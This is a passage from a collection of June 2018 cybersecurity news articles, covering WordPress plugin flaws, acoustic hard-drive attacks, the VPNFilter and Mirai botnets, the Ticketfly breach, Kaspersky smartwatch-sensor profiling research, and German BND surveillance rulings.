CVE identifiers have been assigned to four of the vulnerabilities and ThreatPress says it expects more to be assigned. The identifiers assigned to date are CVE-2018-11579, CVE-2018-11580, CVE-2018-11633 and CVE-2018-11632.

ThreatPress has published technical details and proof-of-concept (PoC) code for each of the vulnerabilities.

“It’s good to know that WordPress Security reacts quickly, but still, we have a big problem. There is no way to inform all users of these plugins about the threat,” Adams said in a blog post. “It’s strange that WordPress can show you information about available updates, but still can’t protect you by providing the information about closed plugins in the same way. We hope to see some changes in this area. In this case, we could notify owners of affected websites and secure almost twenty thousand websites.


Flaws in Multidots WordPress Plugins expose e-Commerce websites to a broad range of attacks
2.6.2018 securityaffairs
Vulnerebility

Researchers at ThreatPress firm discovered security vulnerabilities in ten WordPress plugins developed by Multidots, a company for e-commerce websites.
The vulnerable plugins are available on theWordPress.org and implement a set of features for WooCommerce installations that allow admins to manage their online shops, nearly 20,000 WordPress installs currently use them.

“Recently our research team found serious security issues in ten WordPress plugins developed by the same vendor – MULTIDOTS Inc. company. All vulnerable plugins designed to work alongside with WooCommerce so there is a real threat to all online stores powered by WooCommerce and one of these plugins.” reads a blog post published by ThreatPress.

“We found Stored Cross-Site Scripting (XSS), Cross-Site Request Forgery and SQL Injection vulnerabilities that could be exploited by hackers to upload keyloggers, shells, crypto miners and other malicious software or completely deface the website.”

closed wordpress plugins multidots

Multidots plugins are affected by stored cross-site scripting (XSS), cross-site request forgery (CSRF) and SQL injection vulnerabilities that could be exploited by an attacker to take complete control of e-commerce installs.

The flaws were tracked as CVE-2018-11579, CVE-2018-11580, CVE-2018-11633 and CVE-2018-11632, they could allow attackers to power a broad range of attacks, such as installing cryptocurrency miners or install exploit kits to deliver malware.

Experts warn that some vulnerabilities could be exploited without any user interaction.

The researchers at ThreatPress reported the flaw to Multidots on May 8, the company acknowledged the flaws but at the time it still hasn’t solved the flaws.

ThreatPress published technical details for the vulnerabilities and for each of them a proof-of-concept (PoC) code.

“It’s good to know that WordPress Security reacts quickly, but still, we have a big problem. There is no way to inform all users of these plugins about the threat,” Adams said in a blog post. “It’s strange that WordPress can show you information about available updates, but still can’t protect you by providing the information about closed plugins in the same way. We hope to see some changes in this area. In this case, we could notify owners of affected websites and secure almost twenty thousand websites.”


Crashing HDDs by launching an attack with sonic and ultrasonic signals

2.6.2018 securityaffairs Attack

A team of researchers from the University of Michigan and Zhejiang University has devised a method to cause physical damage to hard drives by using sonic and ultrasonic signals.
An attacker just needs to play ultrasonic sounds through a built-in speaker of a target computer or by using a speaker in its proximity.

The principle is simple, the technique leverages specially crafted acoustic signals to cause significant vibrations in the HDDs components that could cause severe damage.

Modern HDDs use shock sensors to prevent the head crash, but the team of researchers has demonstrated that sonic and ultrasonic sounds could cause false positives in the shock sensor, causing a drive to park the head in a wrong position.

“We created and modeled a new feedback controller that could be deployed as a firmware update to attenuate the intentional acoustic interference. Our sensor fusion method prevents unnecessary head parking by detecting ultrasonic triggering
of the shock sensor” reads the paper published by the experts.

ultrasonic signals attacks

The experts have demonstrated how to use the technique in a real-world attacks targeting HDDs in desktop computers and CCTV (Closed-Circuit Television) systems.

These attackers just need to trick victims into playing a malicious sound attached to an email or triggered visiting a specially crafted web page.

“Our case studies show that an attacker can use the effects from hard disk drive vulnerabilities to launch system level consequences such as crashing Windows on a laptop using the built-in speaker and preventing surveillance systems from recording video. We delve into the details of the Windows and Linux operating systems to uncover the root causes of the crash in the I/O request stack” continues the experts.

The experts tested the technique against various HDD from several vendors, including Seagate, Toshiba, and Western Digital. The discovery was interesting, the ultrasonic waves took just 5-8 seconds to cause severe interferences.

ultrasonic signals attacks

Sound interferences with a duration greater than 105 seconds caused the Western Digital HDD in the video-surveillance device to stop recording from the beginning of the vibration until the device was restarted.

“Recordings from periods of interference less than 105 seconds exhibited video loss from about 12 seconds after being subjected to acoustic induced vibration until the
vibration subsided. In contrast, (2) interference for periods of 105 seconds or longer resulted in video loss from the beginning of the vibration until the device was restarted.” continues the paper.

“In the case that a victim user is not physically near the system being attacked, an adversary can use any frequency to attack the system. The system’s live camera stream never displays an indication of an attack. Also, the system does not provide any method to learn of audio in the environment. Thus, if a victim user were not physically near the system, an adversary can use audible signals while remaining undetected.”

The tests demonstrated that an attacker can disrupt HDDs in desktops and laptops running both Windows and Linux operating system.

The experts were able to cause a Dell XPS 15 9550 laptops to freeze in 45 seconds and crash when the laptop was tricked to play malicious audio over its built-in speaker in 125 seconds.

The paper also includes recommendations to detect or prevent such type of attacks, including a new feedback controller to attenuate the acoustic interference that could be deployed as a firmware update.

Another countermeasure against attacks leveraging sonic and ultrasonic signals could be a sensor fusion method to prevent unnecessary head parking by detecting ultrasonic triggering of the shock sensor.

The last solution is represented by noise dampening materials to attenuate the signal.


Experts believe the botmaster of the VPNFilter is attempting to resume the botnet

2.6.2018 securityaffairs BotNet

Experts from security firms GreyNoise Intelligence and JASK and GreyNoise believe that the threat actor behind the VPNFilter is now attempting to resume the botnet with a new wave of infections.
A week ago security experts and law enforcement bodies reported the existence of a huge Russia-linked botnet tracked as VPNFilter.

The botnet infected over 500,000 routers and NAS devices, most of them in Ukraine, fortunately, a prompt action of authorities allowed to take down it.

VPNFilter malware

Researchers believe the nation-state malware was developed by the same author of the BlackEnergy malware.

Many infected devices have been discovered in Ukraine and their number in the country continues to increase. On May 8, Talos researchers observed a spike in VPNFilter infection activity, most infections in Ukraine and the majority of compromised devices contacted a separate stage 2 C2 infrastructure at the IP 46.151.209[.]33.

The experts discovered the VPNFilter malware has infected devices manufactured by Linksys, MikroTik, Netgear, QNAP, and TP-Link.

Unfortunately, botmasters are attempting to resume the botnet, this is what emerged from the monitoring of the malicious traffic associated with VPNFilter.

Experts from security firms GreyNoise Intelligence and JASK believe that the same threat actor is now attempting to resume the botnet with a new wave of infections.

“JASK actively partners with GreyNoise Intelligence (GNI) to establish better access and visibility for global and regional SYN traffic. Preliminary analysis of GNI results identifies a number of source IPs exclusively scanning for port 2000 (MikroTik devices) in Ukrainian networks.” states a report published by JASK.

“Activity like this raises some interesting questions about indications of ongoing Ukraine targeted campaigns, a likely subject for future research.”

The scans detected by the experts shows threat actors targeting Mikrotik routers on Ukrainian networks with port 2000 exposed online.

The VPNFilter malware is very sophisticated and implements many functionalities used by nation-state malware, such as wipe firmware, communicate via Tor, traffic monitoring, and the ability to target ICS devices.

The US authorities blamed Russia-linked APT28 hacking group for the creation of the botnet, Ukrainian bodies must be vigilant in order to thwart any cyber-attacks that could be powered by the VPNFilter botnet.


Visa payments DOWN: Millions affected by a service disruption
2.6.2018 securityweek Hacking

The Visa card payment system is suffering a widespread outage across Europe, millions of users were unable to make payments using their cards.
Shoppers and travelers were unable to make payments with their cards since at around 2.30pm on Friday across Europe.

At the time of writing, Visa confirmed the widespread problems but did not provide any details on the cause.

VISA

Visa and major banks informed their customers also through social media, while major retailers confirmed that users were not able to pay with their cards.

The problems suffered by Visa Payments are currently affecting also MasterCard and Amex because the two services were rerouting some transactions via Visa’s IT network.

Visa UK

@VisaUK
We are currently experiencing a service disruption which is preventing some Visa transactions in Europe from being processed. We are investigating the cause and working as quickly as possible to resolve the situation. We will keep you updated.

6:49 PM - Jun 1, 2018
162
476 people are talking about this
Twitter Ads info and privacy

Bank of Ireland

@bankofireland
We are aware some customers are experiencing Visa debit card issues. This is impacting multiple banks across Europe. We will update when we know more. Cash withdrawals can be made at any BOI ATM.

5:19 PM - Jun 1, 2018
10
19 people are talking about this
Twitter Ads info and privacy
“We are unable to accept Visa card payments currently. No retailers are able to accept Visa cards.” said Marks & Spencer.


Ticketfly website was compromised, the hacker also stole customers’ data
2.6.2018 securityweek Hacking

The website of the events ticketing company Ticketfly was shut down after a hacker who calls himself “IsHaKdZ” compromised it.
The hacker defaced the Ticketfly website with a picture of Guy Fawkes and a warning that read “Your Security Down im Not Sorry.” The attacker also published a yandex.com email account along with the following message:

“Ticketfly HacKeD By IsHaKdZ. Your Security Down im Not Sorry. Next time I will publish database ‘backstage’ (sic).”

The hacker also warned administrators that it has access to a database titled “backstage,” he shared links to files containing customer and client information, including names, physical addresses, phone numbers and email addresses.

Ticketfly hacked

Ticketfly, which is owned by Eventbrite, has taken down the site in response to the incident and posted a data breach notification.

“We are currently investigating a cybersecurity incident targeting Ticketfly.com that has resulted in the compromise of some client and customer information. After learning of the incident, we immediately launched an investigation, and out of an abundance of caution, we took the site down while we work to address the issue.” reads the data breach notification published by the company,

“Out of an abundance of caution, we have taken all Ticketfly systems temporarily offline as we continue to look into the issue. We are working to bring our systems back online as soon as possible,”

Troy Hunt

@troyhunt
Seeing a lot of tweets about a breach at @ticketfly right now: https://twitter.com/search?q=ticketfly&src=typd …

6:38 AM - May 31, 2018
18
See Troy Hunt's other Tweets
Twitter Ads info and privacy
Everyone has purchased tickets via the Ticketfly platform will have to print them out and bring a photo ID to the venue hosting the event. Tiketfly provides printed guest lists to the venue.

People who have tickets purchased by other people may need to show the original payment card used to buy the ticket, a copy of the original buyer’s ID, and an authorization note from the original buyer.

Motherboard has spoken with the hacker who confirmed that initially attempted to contact the company to report a vulnerability in the website but without success. He asked for the payment of 1 bitcoin di disclose the issue, but without receiving reply he decided to exploit the flaw.

Motherboard confirmed the authenticity at least some of the records stored in the files leaked by the hacker.

“In an email conversation with Motherboard, the hacker claimed to have warned Ticketfly of a vulnerability that allowed him to take control of “all database” for Ticketfly and its website.” wrote Lorenzo Bicchierai on Motherboard. “The hacker said they asked for 1 bitcoin to share the details of the vulnerability but did not get a reply. The hacker shared what appears to be two emails between him and a series of Ticketfly employees in which the hacker mentions the vulnerability.”

The company confirmed that is still investigating the issue in order to determine the extent of the security breach.

“Our investigation into the incident is ongoing. We’re putting all of our resources to confirm the extent of the unauthorized access. We’re committed to communicating with all customers once we have more information about the scope of the issue,” Ticketfly told customers.” continues the notification.


Crooks expand the original Mirai botnet code base with new capabilities and improvements
2.6.2018 securityweek  CyberCrime

Cybercriminals continue to improve the infamous Mirai botnet by adding new exploits and functionalities, experts warn new dangerous variant will appear in the wild.
According to Netscout’s Arbor Security Engineering and Response Team (ASERT), cybercriminals continue to improve the dreaded Mirai IoT botnet by adding new exploits and functionalities.

The time to market of new Mirai botnet versions is drastically reducing, in a few months experts spotted at least four Mirai variants in the wild, Satori, JenX, OMG and Wicked.

Vxers are used the leaked Mirai source code to create their own version, this trend is scaring security experts.

“Using Mirai as a framework, botnet authors can quickly add in new exploits and functionally, thus dramatically decreasing the development time for botnets. The Mirai source is not limited to only DDoS attacks. A variant of Satori was discovered which attacks Ethereum mining clients.” states the report published by Netscout.

Mirai botnet

Below the key findings for the new Mirai Variants

Satori uses a remote code injection exploits to implement scanning feature.
The JenX bot evolved from Mirai to include similar coding, but authors removed scanning and exploitation capabilities.
The OMG bot adds HTTP and SOCKS proxy capabilities.
The Wicked Mirai exploits RCE flaws to infect Netgear routers and CCTV-DVR devices. When vulnerable devices are found, a copy of the Owari bot is downloaded and executed.
Cyber criminals will continue to use the Mirai variants to build large botnets, for this reason, it experts recommend organizations to apply proper patching, updates, and DDoS mitigation strategies to protect their infrastructure.

“As seen with the four samples covered above, botnet authors are already using the Mirai source code as their building blocks. As the explosion of IoT devices does not look to be slowing down, we believe we’ll continue to see increases in IoT botnets.” concluded the report.

“We are likely to see remnants of Mirai live on in these new botnets as well.”


Trojan watch

1.6.2018 Kaspersky Virus
The cyberphysical risks of wearable gadgets
We continue to research how proliferation of IoT devices affects the daily lives of users and their information security. In our previous study, we touched upon ways of intercepting authentication data using single-board microcomputers. This time, we turned out attention to wearable devices: smartwatches and fitness trackers. Or more precisely, the accelerometers and gyroscopes inside them.

From the hoo-ha surrounding Strava, we already know that even impersonal data on user physical activity can make public what should be non-public information. But at the individual level, the risks are far worse: these smart devices are able to track the moments you’re entering a PIN code in an ATM, signing into a service, or unlocking a smartphone.

In our study, we examined how analyzing signals within wearable devices creates opportunities for potential intruders. The findings were less than encouraging: although looking at the signals from embedded sensors we investigated cannot (yet) emulate “traditional” keyloggers, this can be used to build a behavioral profile of users and detect the entry of critical data. Such profiling can happen discreetly using legitimate apps that run directly on the device itself. This broadens the capacity for cybercriminals to penetrate victims’ privacy and facilitates access to the corporate network of the company where they work.

So, first things first.

Behavioral profiling of users
When people hear the phrase ‘smart wearables’, they most probably think of miniature digital gadgets. However, it is important to understand that most smartwatches are cyberphysical systems, since they are equipped with sensors to measure acceleration (accelerometers) and rotation (gyroscopes). These are inexpensive miniature microcircuits that frequently contain magnetic field sensors (magnetometers) as well. What can be discovered about the user if the signals from these sensors are continuously logged? More than the owner of the gadget would like.

For the purpose of our study, we wrote a fairly simple app based on Google’s reference code and carried out some neat experiments with the Huawei Watch (first generation), Kingwear KW88, and PYiALCY X200 smartwatches based on the Android Wear 2.5 and Android 5.1 for Smartwatch operating systems. These watches were chosen for their availability and the simplicity of writing apps for them (we assume that exploiting the embedded gyroscope and accelerometer in iOS would follow a similar path).

Logging smartwatch signals during password entry

To determine the optimal sampling frequency of the sensors, we conducted a series of tests with different devices, starting with low-power models (in terms of processor) such as the Arduino 101 and Xiaomi Mi Band 2. However, the sensor sampling and data transfer rates were unsatisfactory — to obtain cross-correlation values that were more or less satisfactory required a sampling frequency of at least 50 Hz. We also rejected sampling rates greater than 100 Hz: 8 Kbytes of data per second might not be that much, but not for hours-long logs. As a result, our app sampled the embedded sensors with a frequency of 100 Hz and logged the instantaneous values of the accelerometer and gyroscope readings along three axes (x, y, z) in the phone’s memory.

Admittedly, getting a “digital snapshot” of a whole day isn’t that easy, because the Huawei watch’s battery life in this mode is no more than six hours.

But let’s take a look at the accelerometer readings for this period. The vertical axis shows the acceleration in m/s2, and the horizontal the number of samples (each corresponds to 10 milliseconds on average). For a complete picture, the accelerometer and gyroscope readings are presented in the graphs below.

Digital profile of a user recorded in one hour. Top — accelerometer signals, bottom — gyroscope signals

The graphs contains five areas in which different patterns are clearly visible. For those versed in kinematics, this graph tells a lot about the user.

The most obvious motion pattern is walking. We’ll start with that.

When the user is walking, the hand wearing the smartwatch oscillates like a pendulum. Pendulum swings are a periodic process. Therefore, if there are areas on the graph where the acceleration or orientation readings from the motion sensor vary according to the law of periodicity, it can be assumed that the user was walking at that moment. When analyzing the data, it is worth considering the accelerometer and gyroscope readings as a whole.

Let’s take a closer look at the areas with the greatest oscillations over short time intervals (the purple areas Pattern1, Pattern3, and Pattern5).

Accelerometer and gyroscope readings during walking

In our case, periodic oscillations of the hand were observed for a duration of 12 minutes (Pattern1, figure above). Without requesting geoinformation, it’s difficult to say exactly where the user was going, although a double numerical integration of the acceleration data shows with an accuracy up to the integration constants (initial velocity and coordinates) that the person was walking somewhere, and with varying characteristic velocity.

Result of the numerical integration of the accelerometer data, which gives an estimate of the user’s movement along the x and y axes in the space of one hour (z-axis displacement is zero, so the graph does not show it)

Note that plotting the Y-axis displacement relative to the X-axis displacement gives the person’s approximate path. The distances here are not overly precise, but they are in the order of thousands of meters, which is actually quite impressive, because the method is very primitive. To refine the distance traveled, anthropometric data can be used to estimate the length of each step (which is basically what fitness trackers do), but we shall not include this in our study.

Approximate path of the person under observation, determined on the basis of numerically integrating the accelerometer data along the X and Y axes

It is more difficult to analyze the less active areas. Clearly, the person was at rest during these periods. The orientation of the watch does not change, and there is acceleration, which suggests that the person is moving by car (or elevator).

Another 22-minute segment is shown below. This is clearly not walking — there are no observable periodic oscillations of the signal. However, we see a periodic change in the acceleration signal envelope along one axis. It might be a means of public transport that moves in a straight line, but with stops. What is it? Some sort of public transportation?

Accelerometer data when traveling on public transport

Here’s another time slice.

Pattern 3, accelerometer data

This seems to be a mixture of short periods of walking (for a few seconds), pauses, and abrupt hand movements. The person is presumably indoors.

Below we interpret all the areas on the graph.

Accelerometer and gyroscope readings with decoding of areas

These are three periods of walking (12, 3, and 5 minutes) interspersed with subway journeys (20 and 24 minutes). The short walking interval has some particular characteristics, since it involved changing from one subway line to another. These features are clearly visible, but our interest was in determining them using algorithms that can be executed on the wearable devices themselves. Therefore, instead of neural networks (which we know to be great at this kind of task), we used a simple cross-correlation calculation.

Taking two walking patterns (Walking1 and Walking2), we calculated their cross-correlation with each other and the cross-correlation with noise data using 10-second signal data arrays.

Function
Experiment max (cor) Ax max (cor) Ay max (cor) Az max (cor) Wx max (cor) Wy max (cor) Wz
Walking1 and Walking2 0.73 0.70 0.64 0.62 0.41 0.83
Walking1 and Noise 0.33 0.30 0.32 0.30 0.33 0.33
Maxima of the functions for cross-correlation of walking patterns with each other and with an arbitrary noise pattern

It can be seen from the table that even this elementary approach for calculating cross-correlation functions allows us to identify the user’s movement patterns within his/her “digital snapshot” with an accuracy of up to 83% (given a very rough interpretation of the correlation). This indicator may not seem that high, but it should be stressed that we did not optimize the sample size and did not use more complex algorithms, for example, principle component analysis, which is assumed to work quite well in determining the characteristic parts of the signal log.

What does this provide to the potential attackers? Having identified the user’s movements in the subway, and knowing the characteristic directions of such movement, we can determine which subway line the user is traveling on. Sure, it would be much easier having data about the orientation of the X and Y axes in space, which could be obtained using a magnetometer. Unfortunately, however, the strong electromagnetic pickup from the electric motors, the low accuracy of determining a northerly direction, and the relatively few magnetometers in smartwatches forced us to abandon this idea.

Without data on the orientation of the X and Y axes in space (most likely, different for individual periods), the problem of decoding the motion trajectory becomes a geometric task of overlaying time slices of known length onto the terrain map. Again, placing ourselves in the attacker’s shoes, we would look for the magnetic field bursts indicate the acceleration/deceleration of an electric train (or tram or trolleybus), which can provide additional information allowing us to work out the number of interim points in the time slices of interest to us. But this too is outside the scope of our study.

Cyberphysical interception of critical data
But what does this all reveal about the user’s behavior? More than a bit, it turns out. It is possible to determine when the user arrives at work, signs into a company computer, unlocks his or her phone, etc. Comparing data on the subject’s movement with the coordinates, we can pinpoint the moments when they visited a bank and entered a PIN code at an ATM.

PIN codes
How easy is it to capture a PIN code from accelerometer and gyroscope signals from a smartwatch worn on the wrist? We asked four volunteers to enter personal PINs at a real ATM.

Accelerometer signals when entering a PIN code on an ATM keypad

Jumping slightly ahead, it’s not so simple to intercept an unencrypted PIN code from sensor readings by elementary means. However, this section of the “accelerometer log” gives away certain information — for example, the first half of the graph shows that the hand is in a horizontal position, while the oscillating values in the second half indicate keys being pressed on the ATM keypad. With neural networks, signals from the three axes of the accelerometer and gyroscope can be used to decipher the PIN code of a random person with a minimum accuracy of 80% (according to colleagues from Stevens Institute of Technology). The disadvantage of such an attack is that the computing power of smartwatches is not yet sufficient to implement a neural network; however, it is quite feasible to identify this pattern using a simple cross-correlation calculation and then transfer the data to a more powerful machine for decoding. Which is what we did, in fact.

Function
Experiment max (cor) Ax max (cor) Ay max (cor) Az max (cor) Wx max (cor) Wy max (cor) Wz
One person and different tries 0.79 0.87 0.73 0.82 0.51 0.81
Maxima of the functions for cross-correlation of PIN entry data at an ATM

Roughly interpreting these results, it is possible to claim 87% accuracy in recovering the PIN entry pattern from the general flow of signal traffic. Not bad.

Passwords and unlock codes
Besides trips to the ATM, we were interested in two more scenarios in which a smartwatch can undermine user security: entering computer passwords and unlocking smartphones. We already knew the answer (for computers and phones) using a neural network, of course, but we still wanted to explore first-hand, so to speak, the risks of wearing a smartwatch.

Sure, capturing a password entered manually on a computer requires the person to wear a smartwatch on both wrists, which is an unlikely scenario. And although, theoretically, dictionaries could be used to recover semantically meaningful text from one-handed signals, it won’t help if the password is sufficiently strong. But, again, the main danger here is less about the actual recovery of the password from sensor signals than the ease of detecting when it is being entered. Let’s consider these scenarios in detail.

We asked four people to enter the same 13-character password on a computer 20 times. Similarly, we conducted an experiment in which two participants unlocked an LG Nexus 5X smartphone four times each with a 4-digit key. We also logged the movements of each participant when emulating “normal” behavior, especially in chat rooms. At the end of the experiment, we synchronized the time of the readings, cutting out superfluous signals.

In total, 480 discrete functions were obtained for all sensor axes. Each of them contains 250-350 readings, depending on the time taken to enter the password or arbitrary data (approximately three seconds).

Signal along the accelerometer and gyroscope axes for four attempts by one person to enter one password on a desktop computer

To the naked eye, the resulting graphs are almost identical; the extremes coincide, partly because the password and mode of entry were identical in all attempts. This means that the digital fingerprints produced by one and the same person are very similar to each other.

Signals along the accelerometer and gyroscope axes for attempts to enter the same password by different people on a desktop computer

When overlaying the signals received from different people, it can be seen that, although the passphrase is the same, it is entered differently, and even visually the extremes do not coincide!

Attempts to enter a smartphone unlock code by two different people

It is a similar story with mobile phones. Moreover, the accelerometer captures the moments when the screen is tapped with the thumb, from which the key length can be readily determined.

But the eye can be deceived. Statistics, on the other hand, are harder to hoodwink. We started with the simplest and most obvious method of calculating the cross-correlation functions for the password entry attempts by one person and for those by different people.

The table shows the maxima of the functions for cross-correlation of data for the corresponding axes of the accelerometer and gyroscope.

Function
Experiment max (cor) Ax max (cor) Ay max (cor) Az max (cor) Wx max (cor) Wy max (cor) Wz
One person 0.92 0.63 0.71 0.55 0.76 0.96
Different persons 0.65 0.35 0.31 0.23 0.37 0.76
Maxima of the functions for cross-correlation of password input data entered by different people on a desktop computer

Broadly speaking, it follows that even a very simple cross-correlation calculation can identify a person with up to 96% accuracy! If we compare the maxima of the cross-correlation function for signals from different people in arbitrary text input mode, the correlation maximum does not exceed 44%.

Function
Experiment max (cor) Ax max (cor) Ay max (cor) Az max (cor) Wx max (cor) Wy max (cor) Wz
One person and different activity 0.32 0.27 0.39 0.26 0.30 0.44
Maxima of the functions for cross-correlation of data for different activities (password entry vs. usual surfing)

Function
Experiment max (cor) Ax max (cor) Ay max (cor) Az max (cor) Wx max (cor) Wy max (cor) Wz
One person 0.64 0.47 0.56 0.41 0.30 0.58
Different persons 0.33 0.40 0.40 0.32 0.38 0.34
Maxima of the functions for cross-correlation of data for an unlock code entered by one person and by different people

Note that the smallest cross-correlation function values were obtained for entering the smartphone unlock code (up to 64%), and the largest (up to 96%) for entering the computer password. This is to be expected, since the hand movements and corresponding acceleration (linear and angular) are minimal in the case of unlocking.

However, we note once more that the computing power available to a smartwatch is sufficient to calculate the correlation function, which means that a smart wearable gadget can perform this task by itself!

Conclusions
Speaking from the information security point of view, we can conclude that, without a doubt, portable cyberphysical systems expand the attack surface for potential intruders. That said, the main danger lies not in the direct interception of input data — that is quite difficult (the most successful results are achieved using neural networks) and thus far the accuracy leaves much to be desired. It lies instead in the profiling of users’ physical behavior based on signals from embedded sensors. Being “smart,” such devices are able to start and stop logging information from sensors not only through external commands, but on the occurrence of certain events or the fulfillment of certain conditions.

The recorded signals can be transmitted by the phone to the attacker’s server whenever the latter has access to the Internet. So an unassuming fitness app or a new watch face from the Google Play store can be used against you, right now in fact. The situation is compounded by the fact that, in addition to this app, simply sending your geotag once and requesting the email address linked to your Google Play account is enough to determine, based on your movements, who you are, where you’ve been, your smartphone usage, and when you entered a PIN at an ATM.

We found that extracting data from traffic likely to correspond to a password or other sensitive information (name, surname, email address) is a fairly straightforward task. Applying the full power of available recognition algorithms to these data on a PC or in cloud services, attackers, as shown earlier, can subsequently recover this sensitive information from accelerometer and gyroscope signal logs. Moreover, the accumulation of these signals over an extended period facilitates the tracking of user movements — and that’s without geoinformation services (such as GPS/GLONASS, or base station signals).

We established that the use of simple methods of analyzing signals from embedded sensors such as accelerometers and gyroscopes makes it possible (even with the computing power of a wearable device) to determine the moments when one and the same text is entered (for example, authentication data) to an accuracy of up to 96% for desktop computers and up to 64% for mobile devices. The latter accuracy could be improved by writing more complex algorithms for processing the signals received, but we intentionally applied the most basic mathematical toolbox. Considering that we viewed this experiment through the prism of the threat to corporate users, the results obtained for the desktop computer are a major cause for concern.

A probable scenario involving the use of wearable devices relates to downloading a legitimate app to a smartwatch — for example, a fitness tracker that periodically sends data packets of several dozen kilobytes in size to a server (for example, the uncompressed “signal signature” for the 13-character password was about 48 kilobytes).

Since the apps themselves are legitimate, we assume that, alongside our Android Wear/Android for Smartwatch test case, this scenario can be applied to Apple smartwatches, too.

Recommendations
There are several indications that an app downloaded onto a smartwatch might not be safe.

If, for instance, the app sends a request for data about the user’s account (the GET_ACCOUNTS permission in Android), this is cause for concern, since cybercriminals need to match the “digital fingerprint” with its owner. However, the app can also allow the user to register by providing an email address — but in this case you are at least free to enter an address different to that of the Google Play account to which your bank card is linked.
If the app additionally requests permission to send geolocation data, your suspicions should be aroused even further. The obvious advice in this situation is not to give additional permissions to fitness trackers that you download onto your smartwatch, and to specify a company email address at the time of registration.
A short battery life can also be a serious cause for concern. If your gadget discharges in just a few hours, this is a sign that you may be under observation. Theoretically, a smartwatch can store logs of your activity with length up to dozens of hours and upload this data later.
In general, we recommend keeping a close eye on smartwatches sported by employees at your office, and perhaps regulating their use in the company’s security policies. We plan to continue our research into cyberphysical systems such as wearable smart gadgets, and the additional risks of using them.


PE Firm Thoma Bravo Buys Majority Stake in LogRhythm
1.6.2018 securityweek IT

Private equity firm Thoma Bravo announced on Thursday that it will acquire a majority interest in Security Information and Event Management (SIEM) solutions vendor LogRhythm.

Terms of the deal, which is expected to close in Q3 2018, were not disclosed.

Founded in 2003, LogRhythm is veteran security firm that has raised more than $110 Million in funding, and has more than 2,500 customers around the world that use its platform that combines traditional SIEM capabilities with user and entity behavior analytics (UEBA).

“Thoma Bravo has long admired the work of Andy, Chris, Phil Villella and the entire LogRhythm team,” said Seth Boro, a managing partner at Thoma Bravo. “The company’s impressive track record of growth shows the continued demand for LogRhythm’s differentiated offerings. With Thoma Bravo’s investment, we look to further accelerate product innovation and drive continued customer success.”

Thoma Bravo has made several large investments in the cybersecurity space over the years. Its portfolio of investments include SonicWall, SailPoint, Hyland Software, Deltek, Blue Coat Systems, Imprivata, Bomgar, Barracuda Networks, Compuware and SolarWinds.


ProtonMail Launches VPN Application for macOS
1.6.2018 securityweek Apple

Encrypted email service provider ProtonMail on Wednesday announced the availability of a virtual private network (VPN) service for macOS users.

Initially introduced for some of its paid ProtonMail users in early 2017, the VPN service saw a wider launch on Windows last year, and also arrived on Android in January 2018. Last year, the CERN-founded company also launched a Tor hidden service and an encrypted contacts manager.

Following a beta testing period, the Swiss-based service provider is now making the VPN application available for all macOS users, allowing them to easily protect their Internet connections. Users who already have a ProtonVPN or ProtonMail account only need to download the application, log in, and start using it immediately.

Developed by the same team behind ProtonMail, the VPN service takes advantage of technologies such as Secure Core and Tor integration and is available for free with no ads. Furthermore, the company claims that users can enjoy it without worrying about malware or monetization of user data.

“With our VPN for Mac application, it is now extremely simple to switch countries, create custom profiles, connect to the Tor network, and route your traffic through our Secure Core servers. Not to mention all the essential perks of ProtonVPN, like hiding your IP address, defending against cyber-attacks, and unblocking censored content,” ProtonMail says.

Users opting for the free plan get unlimited bandwidth and access to servers in three continents. Upgrade options are available for those looking to gain access to more servers and extra features.

Many members of the ProtonMail community have requested the macOS app, the company says. Over the past months, the service provider has worked closely with over ten thousand beta testers to address bugs in the application and ensure it is not only easy to use, but also visually appealing.

The macOS app also takes advantage of the modern IKEv2 protocol for higher performance, providing users with a faster and more stable connection (it promises speeds of more than 300 Mbps, under the right conditions).

Users will be able to easily connect to any country with a single click, to choose from the available Secure Core servers, Tor servers, and P2P servers, and to create and save custom connection profiles. A VPN kill switch is also available, designed to cut the Internet if the connection to the VPN drops, thus preventing data from leaking when the VPN is not connected.

“More people are starting to wake up to the fact that privacy matters, and it is important to make tools like VPN widely accessible, especially for the over 1.5 billion people around the world who live under Internet surveillance and censorship,” Dr. Andy Yen, CEO of ProtonMail, said in a statement.


German Spy Agency Can Keep Tabs on Internet Hubs: Court
1.6.2018 securityweek  BigBrothers

Germany's spy agency can monitor major internet hubs if Berlin deems it necessary for strategic security interests, a federal court has ruled.

In a ruling late on Wednesday, the Federal Administrative Court threw out a challenge by the world's largest internet hub, the De-Cix exchange, against the tapping of its data flows by the BND foreign intelligence service.

The operator had argued the agency was breaking the law by capturing German domestic communications along with international data.

However, the court in the eastern city of Leipzig ruled that internet hubs "can be required by the federal interior ministry to assist with strategic communications surveillance by the BND".

De-Cix says its Frankfurt hub is the world's biggest internet exchange, bundling data flows from as far as China, Russia, the Middle East and Africa, which handles more than six terabytes per second at peak traffic.

De-Cix Management GmbH, which is owned by eco Association, the European internet industry body, had filed suit against the interior ministry, which oversees the BND and its strategic signals intelligence.

It said the BND, a partner of the US National Security Agency (NSA), has placed so-called Y-piece prisms into its data-carrying fibre optic cables that give it an unfiltered and complete copy of the data flow.

The surveillance sifts through digital communications such as emails using certain search terms, which are then reviewed based on relevance.

De-Cix said in a statement Thursday that it believed the ruling shielded it from criminal liability for violations of the law protecting German domestic communications against tapping by stating that the German government bore responsibility.

However it said it would review whether it would take its complaint to the Federal Constitutional Court.

Given the mass of daily phone calls, emails, chats, internet searches, streamed videos and other online communications, an effective fire-walling of purely German communications is unrealistic, activists argue.

Germany had reacted with outrage when information leaked by former NSA contractor Edward Snowden revealed in 2013 that US agents were carrying out widespread tapping worldwide, including of Chancellor Angela Merkel's mobile phone.

Merkel, who grew up in communist East Germany where state spying on citizens was rampant, declared repeatedly that "spying among friends is not on" while acknowledging Germany's reliance on the US in security matters.

But to the great embarrassment of Germany, it later emerged that the BND helped the NSA spy on European allies.

Berlin in 2016 approved new measures, including greater oversight, to rein in the BND following the scandal.


Yes, Germany BND foreign intelligence service can spy on the world’s biggest internet exchange

1.6.2018 securityaffairs BigBrothers

This week, a federal court has ruled that Germany’s BND foreign intelligence service can monitor major internet hubs for strategic security interests.
Recently, the operator of the world’s top Internet Hub sued the BND foreign intelligence service for the surveillance activity conducted by the spy agency.

The operator wants to be sure that the agency is not violating any law by monitoring German domestic communications as well as tapping international traffic through the De-Cix exchange.

The De-Cix exchange is the world’s biggest internet exchange based in Frankfurt and represents a privileged position for traffic monitoring,

The hub sees more than six terabytes per second at peak traffic from China, Russia, the Middle East and Africa.

The Federal court of Leipzig ruled that internet hubs “can be required by the federal interior ministry to assist with strategic communications surveillance by the BND”.

